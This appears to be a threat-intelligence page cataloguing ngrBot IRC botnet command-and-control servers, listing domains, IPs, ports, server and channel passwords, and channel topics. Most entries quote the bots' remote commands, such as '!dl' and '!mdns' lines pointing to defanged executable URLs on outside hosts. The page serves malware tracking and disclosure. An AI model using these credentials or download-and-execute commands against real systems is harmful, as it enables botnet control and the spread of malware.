ngrBot

dd.sult4n.net (ngrBot hosted in United States Chicago Steadfast Networks)

Thanks to anonymous guy here for finding this botnet. Resolved : [dd.sult4n.net] To [67.202.92.70] Resolved : [www.8rb.su] To [67.202.92.70] Other domains: xx.sult4n.net, x.sult4n.net Thanks to Userbased for this and for server and channel pass Server : dd.sult4n.net:4040 PASS sulxx Channel : #m PASS sul111 Now talking in #m Topic On: [ #m ] [ !mod usbi

178.86.23.225 (ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)

Botnet found by rolls Server: 178.86.23.225:1875 Server Password: Username: uiswnri Nickname: n{DE|XPa}uiswnri Channel: #moon (Password: 4m3r1k) Channeltopic: :.up hxxp://wachalol.com/images/180713.exe b2790c7513a2efbf7cb34f64c4f49ff0 Inactive domain: harlan10.com hosting infos: http://whois.domaintools.com/178.86.23.225

t.baerr01.com (ngrBot irc botnet hosted by Chinanet)

Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187 Server:  t.baerr01.com Port:  6512 Server password:  smart Channel:  #dpi :hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe Channel:  #tar Channel password:  smart A modified ircd is used, making it difficult to connect using a regular irc client. Related md5s (search on

x.e1b2.org (ngrBot irc botnet hosted by namecheap.com)

Resolved x.e1b2.org to 192.64.114.16, 192.64.114.184 Server:  x.e1b2.org Port:  80 Server password:  666666 Channel:  ##Rox-x01## Topic for ##Rox-x01## is: !m on !s -n !mod usbi on !NAZEL hxxp://www8.0zz0.com/2013/05/25/23/865519528.gif !NAZEL hxxp://www12.0zz0.com/2013/05/24/15/675195622.gif !NAZEL hxxp://www12.0zz0.com/2013/05/21/06/487587018.gif Topic for ##Rox-x01## set by xXx at Mon May 27 14:47:02 2013 The server requires SSL to connect Alternate domains: x.e2b3.org x.c1d2.org x.x1ua.org x.x1x2.su

e.balkrev.com (ngrBot hosted in China Changsha Chinanet Hunan Province Network)

Resolved : [e.balkrev.com] To [124.232.150.214] Resolved : [e.balkrev.com] To [60.172.229.40] Resolved : [e.balkrev.com] To [124.232.163.154] Resolved : [e.balkrev.com] To [124.232.163.150] Resolved : [e.balkrev.com] To [124.232.163.119] TCP Traffic: e.balkrev.com:6510 PASS smart Data received: :Fax!Max@hub.us.com ppppmsg n[US{XPa{jikgbsd!jikgbsd@64.31.35.159 JOIN :#dpi [US{XPa{jikgbsd3a2f #dpi :!dl hxxp://146.185.246.160/dqw7.exe !dl hxxp://146.185.246.160/ups.exe !dl hxxp://146.185.246.160/43n.exe !mdns hxxp://salsayvariando.com/av.txt n[US{XPa{jikgbsd!jikgbsd@64.31. JOIN :#mss n[US{XPa{jikgbsd @ #mss  so channels

f.eastmoon.pl (ngrBot hosted in Germany Karlsruhe 1&1 Internet Ag)

Resolved : [f.eastmoon.pl] To [217.160.173.154] Resolved : [f.eastmoon.pl] To [74.208.230.53] Resolved : [f.eastmoon.pl] To [188.138.89.106] Resolved : [f.eastmoon.pl] To [85.25.86.198] Resolved : [f.eastmoon.pl] To [213.165.71.238] Server: 213.165.71.238:9000 Server Password: Username: cemomcb Nickname: n{DEU-XPx86a}rxibehmd Channel: #sp (Password: yap) Channeltopic: :!wBHv0JQ4frCCAfQ1ausiPUf+8V+7lwXPGIyAUdmor0CO5CSlmlrNT0sLhs1byIa5Qf+YnMhtBmCBtEOb6hI= Server: 188.138.89.106:9000 Server Password: Username: pqelloo Nickname: {DEU-XPx86a}pqelloov Channel: #sp (Password: yap) Channeltopic: :!wBHv0JQ4frCCAfQ1ausiPUf+8V+7lwXPGIyAUdmor0CO5CSlmlrNT0sLhs1byIa5Qf+YnMhtBmCBtEOb6hI= Samples: hxxp://hotfile.com/dl/206650590/b80e8ea/spieoaiuasf.html hxxp://199.7.177.236/dl/206565430/6f9ee70/we71fw1fe6320.html Thanks to aLiSs for samples and for finding this net hosting infos:

m.jamtes.com (ngrBot irc botnet hosted by China Hefei Chinanet Anhui Province Network)

Resolved m.jamtes.com to 60.172.228.177   Server:  m.jamtes.com Port:  7384 Server password:  smart Channel:  #spd Channel password:  smart Channel topic #spd:  !mod pdef on !mdns hxxp://146.185.246.240/avxd.gif !dl hxxp://146.185.246.190/msx6971.exe !dl hxxp://146.185.246.104/dqs.exe !s -o !j #1,#2 !dl hxxps://hotfile.com/dl/203712010/822c38b/skybe.exe Channel topic #1:  !dl hxxp://146.185.246.116/mailsw7.exe !dl hxxp://146.185.246.116/lmqw7.exe !dl hxxp://146.185.246.116/five192w7.exe !dl hxxp://146.185.246.116/five172w7.exe Channel topic #2:  !dl hxxp://146.185.246.116/tefw7.exe !dl hxxp://146.185.246.116/p98w7.exe !dl hxxp://146.185.246.116/p18w7.exe

xixbh.net (ngrBot irc botnet hosted by oneandone.net)

Resolved xixbh.net to 212.227.83.111, 213.165.68.138, 85.25.86.198 Server:  xixbh.net (alternate domains: xixbh.com gigasbh.org) Port:  1863 Server password:  jobs Channel:  #jobs Topic for #jobs is: !dl hxxp://hotfile.com/dl/200451226/2ff4c3f/orf4Duu.html Topic for #jobs set by x at Fri Mar 29 13:40:52 2013 SSL is required to connect to this server This is the same guy as these previous posts.

f0001.info/f0010.info/thismynew1.info (ngrBot hosted by Czech Republic Zlin Fdcservers.net)

Resolved : [f0001.info] To [50.7.193.194] Resolved : [f0010.info] To [50.7.193.194] Resolved : [thismynew1.info] To [50.7.193.194] mom002.net not active now Server: 50.7.193.194:1887 Server Password: Username: jhdkutg Nickname: n{DE|XPa}jhdkutg Channel: #bon2 (Password: speedd) Channeltopic: :~pu hxxp://hotfile.com/dl/196250384/528b038/bonkapawes.exe f931d3eb10db2822e2f5d0b989e2a5b4 ~s -o ~s Download URLs hxxp://69.197.137.58/ (api.wipmania.com) hxxp://199.7.177.244/dl/196250388/7241731/avx.exe (hotfile.com) hxxp://74.120.9.239/get/dd7d65c3bbc12e445706a49c446988ac892a41d5/512e2c88/2/812b96beef6fea89/bb28b14/avx.exe (s251.hotfile.com) hxxp://199.7.177.244/dl/196250388/7241731/avx.exe (hotfile.com) hxxp://74.120.9.239/get/a1c05bb55ad6d37d36fec2886739a08919e1fd13/512e2cb6/2/812b96beef6fea89/bb28b14/avx.exe (s251.hotfile.com) hosting infos: http://whois.domaintools.com/50.7.193.194